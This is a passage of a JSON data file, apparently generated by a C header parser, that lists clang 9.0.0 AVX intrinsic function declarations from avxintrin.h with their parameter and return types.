} }, { "tag": "parameter", "name": "__b", "type": { "tag": "__m256" } }], "return-type": { "tag": "__m256" } }, { "tag": "function", "name": "_mm256_or_pd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avxintrin.h:598:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m256d" } }, { "tag": "parameter", "name": "__b", "type": { "tag": "__m256d" } }], "return-type": { "tag": "__m256d" } }, { "tag": "function", "name": "_mm256_or_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avxintrin.h:616:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m256" } }, { "tag": "parameter", "name": "__b", "type": { "tag": "__m256" } }], "return-type": { "tag": "__m256" } }, { "tag": "function", "name": "_mm256_xor_pd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avxintrin.h:634:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m256d" } }, { "tag": "parameter", "name": "__b", "type": { "tag": "__m256d" } }], "return-type": { "tag": "__m256d" } }, { "tag": "function", "name": "_mm256_xor_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avxintrin.h:652:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m256" } }, { "tag": "parameter", "name": "__b", "type": { "tag": "__m256" } }], "return-type": { "tag": "__m256" } }, { "tag": "function", "name": "_mm256_hadd_pd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avxintrin.h:676:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m256d" } }, { "tag": "parameter", "name": "__b", "type": { "tag": "__m256d" } }], "return-type": { "tag": "__m256d" } }, { "tag": "function", "name": "_mm256_hadd_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avxintrin.h:699:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m256" } }, { "tag": "parameter", "name": "__b", "type": { "tag": "__m256" } }], "return-type": { "tag": "__m256" } }, { "tag": "function", "name": "_mm256_hsub_pd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avxintrin.h:722:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m256d" } }, { "tag": "parameter", "name": "__b", "type": { "tag": "__m256d" } }], "return-type": { "tag": "__m256d" } }, { "tag": "function", "name": "_mm256_hsub_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avxintrin.h:745:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m256" } }, { "tag": "parameter", "name": "__b", "type": { "tag": "__m256" } }], "return-type": { "tag": "__m256" } }, { "tag": "function", "name": "_mm_permutevar_pd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avxintrin.h:775:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m128d" } }, { "tag": "parameter", "name": "__c", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128d" } }, { "tag": "function", "name": "_mm256_permutevar_pd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avxintrin.h:814:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m256d" } }, { "tag": "parameter", "name": "__c", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m256d" } }, { "tag": "function", "name": "_mm_permutevar_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avxintrin.h:868:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m128" } }, { "tag": "parameter", "name": "__c", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128" } }, { "tag": "function", "name": "_mm256_permutevar_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avxintrin.h:959:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m256" } }, { "tag": "parameter", "name": "__c", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m256" } }, { "tag": "function", "name": "_mm256_blendv_pd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avxintrin.h:1383:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m256d" } }, { "tag": "parameter", "name": "__b", "type": { "tag": "__m256d" } }, { "tag": "parameter", "name": "__c", "type": { "tag": "__m256d" } }], "return-type": { "tag": "__m256d" } }, { "tag": "function", "name": "_mm256_blendv_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avxintrin.h:1411:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m256" } }, { "tag": "parameter", "name": "__b", "type": { "tag": "__m256" } }, { "tag": "parameter", "name": "__c", "type": { "tag": "__m256" } }], "return-type": { "tag": "__m256" } }, { "tag": "function", "name": "_mm256_cvtepi32_pd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avxintrin.h:2129:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m256d" } }, { "tag": "function", "name": "_mm256_cvtepi32_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avxintrin.h:2144:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m256" } }, { "tag": "function", "name": "_mm256_cvtpd_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avxintrin.h:2160:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m256d" } }], "return-type": { "tag": "__m128" } }, { "tag": "function", "name": "_mm256_cvtps_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avxintrin.h:2175:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m256" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm256_cvtps_pd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avxintrin.h:2191:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m128" } }], "return-type": { "tag": "__m256d" } }, { "tag": "function", "name": "_mm256_cvttpd_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avxintrin.h:2208:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m256d" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm256_cvtpd_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avxintrin.h:2225:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m256d" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm256_cvttps_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avxintrin.h:2241:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m256" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm256_cvtsd_f64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avxintrin.h:2257:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m256d" } }], "return-type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "function", "name": "_mm256_cvtsi256_si32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avxintrin.h:2273:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m256i" } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "_mm256_cvtss_f32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avxintrin.h:2290:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m256" } }], "return-type": { "tag": ":float", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "_mm256_movehdup_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avxintrin.h:2316:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m256" } }], "return-type": { "tag": "__m256" } }, { "tag": "function", "name": "_mm256_moveldup_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avxintrin.h:2341:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m256" } }], "return-type": { "tag": "__m256" } }, { "tag": "function", "name": "_mm256_movedup_pd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avxintrin.h:2363:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m256d" } }], "return-type": { "tag": "__m256d" } }, { "tag": "function", "name": "_mm256_unpackhi_pd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avxintrin.h:2386:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m256d" } }, { "tag": "parameter", "name": "__b", "type": { "tag": "__m256d" } }], "return-type": { "tag": "__m256d" } }, { "tag": "function", "name": "_mm256_unpacklo_pd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avxintrin.h:2408:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m256d" } }, { "tag": "parameter", "name": "__b", "type": { "tag": "__m256d" } }], "return-type": { "tag": "__m256d" } }, { "tag": "function", "name": "_mm256_unpackhi_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avxintrin.h:2435:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m256" } }, { "tag": "parameter", "name": "__b", "type": { "tag": "__m256" } }], "return-type": { "tag": "__m256" } }, { "tag": "function", "name": "_mm256_unpacklo_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avxintrin.h:2462:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m256" } }, { "tag": "parameter", "name": "__b", "type": { "tag": "__m256" } }], "return-type": { "tag": "__m256" } }, { "tag": "function", "name": "_mm_testz_pd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avxintrin.h:2492:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m128d" } }, { "tag": "parameter", "name": "__b", "type": { "tag": "__m128d" } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "_mm_testc_pd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avxintrin.h:2521:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m128d" } }, { "tag": "parameter", "name": "__b", "type": { "tag": "__m128d" } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "_mm_testnzc_pd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avxintrin.h:2551:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m128d" } }, { "tag": "parameter", "name": "__b", "type": { "tag": "__m128d" } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "_mm_testz_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avxintrin.h:2580:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m128" } }, { "tag": "parameter", "name": "__b", "type": { "tag": "__m128" } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "_mm_testc_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avxintrin.h:2609:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m128" } }, { "tag": "parameter", "name": "__b", "type": { "tag": "__m128" } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "_mm_testnzc_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avxintrin.h:2639:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m128" } }, { "tag": "parameter", "name": "__b", "type": { "tag": "__m128" } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "_mm256_testz_pd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avxintrin.h:2668:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m256d" } }, { "tag": "parameter", "name": "__b", "type": { "tag": "__m256d" } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "_mm256_testc_pd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avxintrin.h:2697:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m256d" } }, { "tag": "parameter", "name": "__b", "type": { "tag": "__m256d" } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "_mm256_testnzc_pd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avxintrin.h:2727:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m256d" } }, { "tag": "parameter", "name": "__b", "type": { "tag": "__m256d" } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "_mm256_testz_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avxintrin.h:2756:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m256" } }, { "tag": "parameter", "name": "__b", "type": { "tag": "__m256" } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "_mm256_testc_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avxintrin.h:2785:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m256" } }, { "tag": "parameter", "name": "__b", "type": { "tag": "__m256" } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "_mm256_testnzc_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avxintrin.h:2815:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m256" } }, { "tag": "parameter", "name": "__b", "type": { "tag": "__m256" } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "_mm256_testz_si256", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avxintrin.h:2841:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__b", "type": { "tag": "__m256i" } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "_mm256_testc_si256", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avxintrin.h:2867:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__b", "type": { "tag": "__m256i" } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "_mm256_testnzc_si256", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avxintrin.h:2894:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__b", "type": { "tag": "__m256i" } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "_mm256_movemask_pd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avxintrin.h:2913:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m256d" } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "_mm256_movemask_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avxintrin.h:2931:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m256" } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "_mm256_zeroall", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avxintrin.h:2943:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [], "return-type": { "tag": ":void" } }, { "tag": "function", "name": "_mm256_zeroupper", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avxintrin.h:2954:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [], "return-type": { "tag": ":void" } }, { "tag": "function", "name": "_mm_broadcast_ss", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avxintrin.h:2973:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": ":pointer", "type": { "tag": ":float", "bit-size": 32, "bit-alignment": 32 } } }], "return-type": { "tag": "__m128" } }, { "tag": "function", "name": "_mm256_broadcast_sd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avxintrin.h:2992:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": ":pointer", "type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } } }], "return-type": { "tag": "__m256d" } }, { "tag": "function", "name": "_mm256_broadcast_ss", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avxintrin.h:3011:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": ":pointer", "type": { "tag": ":float", "bit-size": 32, "bit-alignment": 32 } } }], "return-type": { "tag": "__m256" } }, { "tag": "function", "name": "_mm256_broadcast_pd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avxintrin.h:3030:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": ":pointer", "type": { "tag": "__m128d" } } }], "return-type": { "tag": "__m256d" } }, { "tag": "function", "name": "_mm256_broadcast_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avxintrin.h:3050:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": ":pointer", "type": { "tag": "__m128" } } }], "return-type": { "tag": "__m256" } }, { "tag": "function", "name": "_mm256_load_pd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avxintrin.h:3070:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__p", "type": { "tag": ":pointer", "type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } } }], "return-type": { "tag": "__m256d" } }, { "tag": "function", "name": "_mm256_load_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avxintrin.h:3086:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__p", "type": { "tag": ":pointer", "type": { "tag": ":float", "bit-size": 32, "bit-alignment": 32 } } }], "return-type": { "tag": "__m256" } }, { "tag": "function", "name": "_mm256_loadu_pd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avxintrin.h:3103:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__p", "type": { "tag": ":pointer", "type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } } }], "return-type": { "tag": "__m256d" } }, { "tag": "function", "name": "_mm256_loadu_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avxintrin.h:3123:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__p", "type": { "tag": ":pointer", "type": { "tag": ":float", "bit-size": 32, "bit-alignment": 32 } } }], "return-type": { "tag": "__m256" } }, { "tag": "function", "name": "_mm256_load_si256", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avxintrin.h:3143:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__p", "type": { "tag": ":pointer", "type": { "tag": "__m256i" } } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm256_loadu_si256", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avxintrin.h:3159:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__p", "type": { "tag": ":pointer", "type": { "tag": "__m256i_u" } } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm256_lddqu_si256", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avxintrin.h:3180:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__p", "type": { "tag": ":pointer", "type": { "tag": "__m256i" } } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm256_store_pd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avxintrin.h:3200:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__p", "type": { "tag": ":pointer", "type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } } }, { "tag": "parameter", "name": "__a", "type": { "tag": "__m256d" } }], "return-type": { "tag": ":void" } }, { "tag": "function", "name": "_mm256_store_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avxintrin.h:3218:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__p", "type": { "tag": ":pointer", "type": { "tag": ":float", "bit-size": 32, "bit-alignment": 32 } } }, { "tag": "parameter", "name": "__a", "type": { "tag": "__m256" } }], "return-type": { "tag": ":void" } }, { "tag": "function", "name": "_mm256_storeu_pd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avxintrin.h:3236:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__p", "type": { "tag": ":pointer", "type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } } }, { "tag": "parameter", "name": "__a", "type": { "tag": "__m256d" } }], "return-type": { "tag": ":void" } }, { "tag": "function", "name": "_mm256_storeu_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avxintrin.h:3256:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__p", "type": { "tag": ":pointer", "type": { "tag": ":float", "bit-size": 32, "bit-alignment": 32 } } }, { "tag": "parameter", "name": "__a", "type": { "tag": "__m256" } }], "return-type": { "tag": ":void" } }, { "tag": "function", "name": "_mm256_store_si256", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avxintrin.h:3277:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__p", "type": { "tag": ":pointer", "type": { "tag": "__m256i" } } }, { "tag": "parameter", "name": "__a", "type": { "tag": "__m256i" } }], "return-type": { "tag": ":void" } }, { "tag": "function", "name": "_mm256_storeu_si256", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avxintrin.h:3294:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__p", "type": { "tag": ":pointer", "type": { "tag": "__m256i_u" } } }, { "tag": "parameter", "name": "__a", "type": { "tag": "__m256i" } }], "return-type": { "tag": ":void" } }, { "tag": "function", "name": "_mm_maskload_pd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avxintrin.h:3322:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__p", "type": { "tag": ":pointer", "type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } } }, { "tag": "parameter", "name": "__m", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128d" } }, { "tag": "function", "name": "_mm256_maskload_pd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avxintrin.h:3346:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__p", "type": { "tag": ":pointer", "type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } } }, { "tag": "parameter", "name": "__m", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m256d" } }, { "tag": "function", "name": "_mm_maskload_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avxintrin.h:3371:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__p", "type": { "tag": ":pointer", "type": { "tag": ":float", "bit-size": 32, "bit-alignment": 32 } } }, { "tag": "parameter", "name": "__m", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128" } }, { "tag": "function", "name": "_mm256_maskload_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avxintrin.h:3395:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__p", "type": { "tag": ":pointer", "type": { "tag": ":float", "bit-size": 32, "bit-alignment": 32 } } }, { "tag": "parameter", "name": "__m", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m256" } }, { "tag": "function", "name": "_mm256_maskstore_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avxintrin.h:3420:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__p", "type": { "tag": ":pointer", "type": { "tag": ":float", "bit-size": 32, "bit-alignment": 32 } } }, { "tag": "parameter", "name": "__m", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__a", "type": { "tag": "__m256" } }], "return-type": { "tag": ":void" } }, { "tag": "function", "name": "_mm_maskstore_pd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avxintrin.h:3444:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__p", "type": { "tag": ":pointer", "type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } } }, { "tag": "parameter", "name": "__m", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__a", "type": { "tag": "__m128d" } }], "return-type": { "tag": ":void" } }, { "tag": "function", "name": "_mm256_maskstore_pd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avxintrin.h:3468:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__p", "type": { "tag": ":pointer", "type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } } }, { "tag": "parameter", "name": "__m", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__a", "type": { "tag": "__m256d" } }], "return-type": { "tag": ":void" } }, { "tag": "function", "name": "_mm_maskstore_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avxintrin.h:3492:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__p", "type": { "tag": ":pointer", "type": { "tag": ":float", "bit-size": 32, "bit-alignment": 32 } } }, { "tag": "parameter", "name": "__m", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__a", "type": { "tag": "__m128" } }], "return-type": { "tag": ":void" } }, { "tag": "function", "name": "_mm256_stream_si256", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avxintrin.h:3512:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": ":pointer", "type": { "tag": "__m256i" } } }, { "tag": "parameter", "name": "__b", "type": { "tag": "__m256i" } }], "return-type": { "tag": ":void" } }, { "tag": "function", "name": "_mm256_stream_pd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avxintrin.h:3532:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": ":pointer", "type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } } }, { "tag": "parameter", "name": "__b", "type": { "tag": "__m256d" } }], "return-type": { "tag": ":void" } }, { "tag": "function", "name": "_mm256_stream_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avxintrin.h:3553:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__p", "type": { "tag": ":pointer", "type": { "tag": ":float", "bit-size": 32, "bit-alignment": 32 } } }, { "tag": "parameter", "name": "__a", "type": { "tag": "__m256" } }], "return-type": { "tag": ":void" } }, { "tag": "function", "name": "_mm256_undefined_pd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avxintrin.h:3568:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [], "return-type": { "tag": "__m256d" } }, { "tag": "function", "name": "_mm256_undefined_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avxintrin.h:3581:1", "variadic": false, 